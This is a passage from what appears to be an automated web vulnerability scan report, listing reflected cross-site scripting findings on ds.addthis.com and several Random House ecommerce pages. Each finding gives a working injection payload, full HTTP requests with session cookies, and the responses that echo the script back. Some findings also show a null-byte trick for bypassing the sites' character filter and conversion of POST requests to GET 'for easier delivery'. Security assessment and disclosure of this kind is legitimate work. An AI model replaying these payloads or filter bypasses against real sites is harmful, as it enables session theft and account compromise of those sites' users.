Referer: http://www.widgetserver.com/syndication/html5/3651dbe5-aec4-42b2-8270-d62db9a25bfe?widget.appId=3651dbe5-aec4-42b2-8270-d62db9a25bfe&widget.regId=6ba05ce8-62f3-46d0-bb21-b5f833b4817f&widget.friendlyId=msite-ext&widget.name=Mobile%20Web%20App&widget.token=34425cfc81ae44177f1d6c3dc87a11a7b3c559c30000012f8af78211&widget.sid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.vid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.id=0&widget.location=http%3A%2F%2Fwww.widgetbox.com%2Fmobile%2Fbuilder%2F&widget.timestamp=1303854400940&widget.serviceLevel=0&widget.provServiceLevel=2&widget.instServiceLevel=1&widget.width=320&widget.height=460&widget.wrapper=JAVASCRIPT&widget.isAdFriendly=false&widget.isAdEnabled=false&widget.adChannels=&widget.adPlacement=&widget.prototype=MOBILE_APP&widget.ua=mozilla%2F5.0%20%28windows%3B%20u%3B%20windows%20nt%206.1%3B%20en-us%29%20applewebkit%2F534.16%20%28khtml%2C%20like%20gecko%29%20chrome%2F10.0.648.205%20safari%2F534.16&widget.version=5&widget.output=htmlcontent&widget.appPK=145923021&widget.regPK=4248409&widget.providerPK=1860293&widget.userPK=67922830
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css
Date: Tue, 26 Apr 2011 21:48:52 GMT
Expires: Thu, 31 Dec 2020 00:00:00 GMT
Last-Modified: Wed, 20 Apr 2011 23:47:00 GMT
max-age: 604800
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 119

The requested resource(/syndication/mobilef0666<script>alert(1)</script>06d3328fdbc/x/css/preview.css) is not available

5.117. http://ds.addthis.com/red/psi/sites/www.bertelsmann.com/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.bertelsmann.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 1d121<script>alert(1)</script>cb3f46b8a8 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.bertelsmann.com/p.json?callback=_ate.ad.hpr1d121<script>alert(1)</script>cb3f46b8a8&uid=4dab4fa85facd099&url=http%3A%2F%2Fwww.bertelsmann.com%2Fbertelsmann_corp%2Fwms41%2Fbm%2Findex.php%3Flanguage%3D2%2650700%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ee85a0f4245a%3D1&ref=http%3A%2F%2Fburp%2Fshow%2F38&11jhoxa HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh39.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; dt=X; di=%7B%7D..1303775135.1FE|1303775135.60; psc=4; uid=4dab4fa85facd099

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 130
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Tue, 26 Apr 2011 23:30:15 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Thu, 26 May 2011 23:30:15 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Tue, 26 Apr 2011 23:30:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 26 Apr 2011 23:30:15 GMT
Connection: close

_ate.ad.hpr1d121<script>alert(1)</script>cb3f46b8a8({"urls":[],"segments" : [],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

5.118. http://ecommerce.randomhouse.com/cart.do [from parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecommerce.randomhouse.com
Path:   /cart.do

Issue detail

The value of the from request parameter is copied into the HTML document as plain text between tags. The payload %00de38d<script>alert(1)</script>e9bd80595cd was submitted in the from parameter. This input was echoed as de38d<script>alert(1)</script>e9bd80595cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /cart.do?from=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000B6E)%3C/script%3E%00de38d<script>alert(1)</script>e9bd80595cd&addFlag=false&coupon=3&submit=Apply HTTP/1.1
Host: ecommerce.randomhouse.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_cc=true; s_sq=%5B%5BB%5D%5D; SC_LINKS=%5B%5BB%5D%5D; JSESSIONID=916E1DF250E4C8F9A222E994DF92BDD0.ecommerce_wrk1; CP=null*; mbox=session#1303855598284-166145#1303859906|PC#1303855598284-166145#1366930046|check#true#1303858106; RES_SESSIONID=212207240983843; ResonanceSegment=1

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:48:07 GMT
Server: Apache
Set-Cookie: rhcartitems=; Domain=.randomhouse.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 20031


<!-- shoppingCart.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...
</script>.de38d<script>alert(1)</script>e9bd80595cd">
...[SNIP]...

5.119. http://ecommerce.randomhouse.com/cart.do [from parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecommerce.randomhouse.com
Path:   /cart.do

Issue detail

The value of the from request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49283"%3balert(1)//e4e0e74635 was submitted in the from parameter. This input was echoed as 49283";alert(1)//e4e0e74635 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cart.do?from=randomhouse49283"%3balert(1)//e4e0e74635 HTTP/1.1
Host: ecommerce.randomhouse.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; RES_SESSIONID=212207240983843; ResonanceSegment=1; __qca=P0-874375948-1303855562358; s_cc=true; SC_LINKS=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:06:26 GMT
Server: Apache
Set-Cookie: JSESSIONID=6766FA4ECEF48F7FBF98EEE206AFFBC1.ecommerce_wrk1; Path=/
Set-Cookie: rhcartitems=; Domain=.randomhouse.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 19589


<!-- shoppingCart.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...
<!--
var s_account="ranhcorporate,ranhrollup";
var rh_division="Random House Corporate";
var rh_imprint="";
var rh_store="randomhouse49283";alert(1)//e4e0e74635";
//-->
...[SNIP]...

5.120. http://ecommerce.randomhouse.com/cart.do [from parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecommerce.randomhouse.com
Path:   /cart.do

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17962"><script>alert(1)</script>6f8a1d41037 was submitted in the from parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cart.do?from=randomhouse17962"><script>alert(1)</script>6f8a1d41037 HTTP/1.1
Host: ecommerce.randomhouse.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; RES_SESSIONID=212207240983843; ResonanceSegment=1; __qca=P0-874375948-1303855562358; s_cc=true; SC_LINKS=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:06:25 GMT
Server: Apache
Set-Cookie: JSESSIONID=CF4601245B0C770882DDB50544AA239B.ecommerce_wrk1; Path=/
Set-Cookie: rhcartitems=; Domain=.randomhouse.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 19701


<!-- shoppingCart.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...
<a class="rollover" href="http://ecommerce.randomhouse.com/cart.do?from=randomhouse17962"><script>alert(1)</script>6f8a1d41037">
...[SNIP]...

5.121. https://ecommerce.randomhouse.com/account.do [from parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   /account.do

Issue detail

The value of the from request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74f99'%3balert(1)//44955d1d1a9 was submitted in the from parameter. This input was echoed as 74f99';alert(1)//44955d1d1a9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /account.do?from=74f99'%3balert(1)//44955d1d1a9 HTTP/1.1
Host: ecommerce.randomhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=212207240983843; JSESSIONID=38D14861B5F177BDEE31B25C6E8D7C7F.ecommerce_wrk1; s_cc=true; ResonanceSegment=1; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_sq=%5B%5BB%5D%5D; RES_TRACKINGID=686529694590717; CP=null*; rhcartitems=; SC_LINKS=%5B%5BB%5D%5D; __qca=P0-874375948-1303855562358; mbox=session#1303855598284-166145#1303858166|PC#1303855598284-166145#1366928306|check#true#1303856366;

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:20:46 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 16995


<!-- signIn.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/
...[SNIP]...
<!--
   // extract 'from' param
   var url = window.location.href;
   var paramStart = url.indexOf("?");
   var fromParam = '';
   if( '74f99';alert(1)//44955d1d1a9' == '') {
       if( paramStart != -1) {
           var paramString = url.substr(paramStart + 1);
           var tokenStart = paramString.indexOf('from');
           if( tokenStart != -1) {
               var token = paramString.substr(toke
...[SNIP]...

5.122. https://ecommerce.randomhouse.com/account.do [from parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   /account.do

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13d54"><script>alert(1)</script>e958056cf4c was submitted in the from parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /account.do?from=randomhouse13d54"><script>alert(1)</script>e958056cf4c HTTP/1.1
Host: ecommerce.randomhouse.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; RES_SESSIONID=212207240983843; ResonanceSegment=1; __qca=P0-874375948-1303855562358; s_cc=true; SC_LINKS=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:06:39 GMT
Server: Apache
Set-Cookie: JSESSIONID=BB1FFAF98719ADA63DDF7D45FE159378.ecommerce_wrk1; Path=/; Secure
Content-Type: text/html;charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 17203


<!-- signIn.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/
...[SNIP]...
<a class="rollover" href="http://ecommerce.randomhouse.com/cart.do?from=randomhouse13d54"><script>alert(1)</script>e958056cf4c">
...[SNIP]...

5.123. https://ecommerce.randomhouse.com/account.do [from parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   /account.do

Issue detail

The value of the from request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 584a0"%3balert(1)//4a17c54e7d8 was submitted in the from parameter. This input was echoed as 584a0";alert(1)//4a17c54e7d8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /account.do?from=randomhouse584a0"%3balert(1)//4a17c54e7d8 HTTP/1.1
Host: ecommerce.randomhouse.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; RES_SESSIONID=212207240983843; ResonanceSegment=1; __qca=P0-874375948-1303855562358; s_cc=true; SC_LINKS=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:06:40 GMT
Server: Apache
Set-Cookie: JSESSIONID=83BECC0B608D70FD1431DA4C08A24D6A.ecommerce_wrk1; Path=/; Secure
Content-Type: text/html;charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 17083


<!-- signIn.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/
...[SNIP]...
<!--
var s_account="ranhcorporate,ranhrollup";
var rh_division="Random House Corporate";
var rh_imprint="";
var rh_store="randomhouse584a0";alert(1)//4a17c54e7d8";
//-->
...[SNIP]...

5.124. https://ecommerce.randomhouse.com/create-account-submit.do [confirmPassword parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   /create-account-submit.do

Issue detail

The value of the confirmPassword request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ef75"><script>alert(1)</script>4190709400fddb906 was submitted in the confirmPassword parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /create-account-submit.do?shippingAddress=useBillingAddress&email=%27%40%27.com&firstName=llkk+kkk&lastName=kkk+&company=&street1=123+mmm+st+&street2=&city=new+york&stateProvince=NY&country=US&zipPostalCode=10010&phoneNumber=999-988-0987&faxNumber=&password=1234rf&confirmPassword=1234rf7ef75"><script>alert(1)</script>4190709400fddb906&optinemail=Y HTTP/1.1
Host: ecommerce.randomhouse.com
Connection: keep-alive
Referer: https://ecommerce.randomhouse.com/create-account-submit.do
Cache-Control: max-age=0
Origin: https://ecommerce.randomhouse.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_cc=true; s_sq=%5B%5BB%5D%5D; SC_LINKS=%5B%5BB%5D%5D; JSESSIONID=916E1DF250E4C8F9A222E994DF92BDD0.ecommerce_wrk1; rhecommerce='"--></style></script><script>netsparker(0x000B6E)</script>|null|www.randomhouse.com|3; mbox=session#1303855598284-166145#1303859918|PC#1303855598284-166145#1366930058|check#true#1303858118; CP=null*; RES_SESSIONID=212207240983843; ResonanceSegment=1

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:58:29 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 20934


<!--createAccount.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.
...[SNIP]...
<input type="password" name="confirmPassword" value="1234rf7ef75"><script>alert(1)</script>4190709400fddb906">
...[SNIP]...

5.125. https://ecommerce.randomhouse.com/create-account-submit.do [email parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   /create-account-submit.do

Issue detail

The value of the email request parameter is copied into the HTML document as plain text between tags. The payload 41e31<script>alert(1)</script>df5ae1c2f9536e1ca was submitted in the email parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /create-account-submit.do?shippingAddress=useBillingAddress&email=%27%40%27.com41e31<script>alert(1)</script>df5ae1c2f9536e1ca&firstName=llkk+kkk&lastName=kkk+&company=&street1=123+mmm+st+&street2=&city=new+york&stateProvince=NY&country=US&zipPostalCode=10010&phoneNumber=999-988-0987&faxNumber=&password=1234rf&confirmPassword=1234rf&optinemail=Y HTTP/1.1
Host: ecommerce.randomhouse.com
Connection: keep-alive
Referer: https://ecommerce.randomhouse.com/create-account-submit.do
Cache-Control: max-age=0
Origin: https://ecommerce.randomhouse.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_cc=true; s_sq=%5B%5BB%5D%5D; SC_LINKS=%5B%5BB%5D%5D; JSESSIONID=916E1DF250E4C8F9A222E994DF92BDD0.ecommerce_wrk1; rhecommerce='"--></style></script><script>netsparker(0x000B6E)</script>|null|www.randomhouse.com|3; mbox=session#1303855598284-166145#1303859918|PC#1303855598284-166145#1366930058|check#true#1303858118; CP=null*; RES_SESSIONID=212207240983843; ResonanceSegment=1

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:52:42 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 17138


<!-- account.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www
...[SNIP]...
<span class="loggedInText">'@'.com41e31<script>alert(1)</script>df5ae1c2f9536e1ca</span>
...[SNIP]...

5.126. https://ecommerce.randomhouse.com/create-account-submit.do [password parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   /create-account-submit.do

Issue detail

The value of the password request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7dc3b"><script>alert(1)</script>a734b570e5619ecdd was submitted in the password parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /create-account-submit.do?shippingAddress=useBillingAddress&email=%27%40%27.com&firstName=llkk+kkk&lastName=kkk+&company=&street1=123+mmm+st+&street2=&city=new+york&stateProvince=NY&country=US&zipPostalCode=10010&phoneNumber=999-988-0987&faxNumber=&password=1234rf7dc3b"><script>alert(1)</script>a734b570e5619ecdd&confirmPassword=1234rf&optinemail=Y HTTP/1.1
Host: ecommerce.randomhouse.com
Connection: keep-alive
Referer: https://ecommerce.randomhouse.com/create-account-submit.do
Cache-Control: max-age=0
Origin: https://ecommerce.randomhouse.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_cc=true; s_sq=%5B%5BB%5D%5D; SC_LINKS=%5B%5BB%5D%5D; JSESSIONID=916E1DF250E4C8F9A222E994DF92BDD0.ecommerce_wrk1; rhecommerce='"--></style></script><script>netsparker(0x000B6E)</script>|null|www.randomhouse.com|3; mbox=session#1303855598284-166145#1303859918|PC#1303855598284-166145#1366930058|check#true#1303858118; CP=null*; RES_SESSIONID=212207240983843; ResonanceSegment=1

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:58:19 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 20934


<!--createAccount.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.
...[SNIP]...
<input type="password" name="password" value="1234rf7dc3b"><script>alert(1)</script>a734b570e5619ecdd">
...[SNIP]...

5.127. https://ecommerce.randomhouse.com/create-account.do [from parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   /create-account.do

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c691"><script>alert(1)</script>070b45f3bf0 was submitted in the from parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /create-account.do?from=1c691"><script>alert(1)</script>070b45f3bf0 HTTP/1.1
Host: ecommerce.randomhouse.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_cc=true; s_sq=%5B%5BB%5D%5D; SC_LINKS=%5B%5BB%5D%5D; JSESSIONID=916E1DF250E4C8F9A222E994DF92BDD0.ecommerce_wrk1; RES_SESSIONID=212207240983843; ResonanceSegment=1; CP=null*; mbox=session#1303855598284-166145#1303859906|PC#1303855598284-166145#1366930046|check#true#1303858106

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:48:07 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 20322


<!--createAccount.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.
...[SNIP]...
<a class="rollover" href="http://ecommerce.randomhouse.com/cart.do?from=1c691"><script>alert(1)</script>070b45f3bf0">
...[SNIP]...

5.128. https://ecommerce.randomhouse.com/create-account.do [from parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   /create-account.do

Issue detail

The value of the from request parameter is copied into the HTML document as plain text between tags. The payload %0086d84<script>alert(1)</script>db18887c0e9 was submitted in the from parameter. This input was echoed as 86d84<script>alert(1)</script>db18887c0e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /create-account.do?from=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000B06)%3C/script%3E%0086d84<script>alert(1)</script>db18887c0e9 HTTP/1.1
Host: ecommerce.randomhouse.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_cc=true; s_sq=%5B%5BB%5D%5D; SC_LINKS=%5B%5BB%5D%5D; JSESSIONID=916E1DF250E4C8F9A222E994DF92BDD0.ecommerce_wrk1; CP=null*; mbox=session#1303855598284-166145#1303859906|PC#1303855598284-166145#1366930046|check#true#1303858106; RES_SESSIONID=212207240983843; ResonanceSegment=1

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:48:29 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 20496


<!--createAccount.vm -->


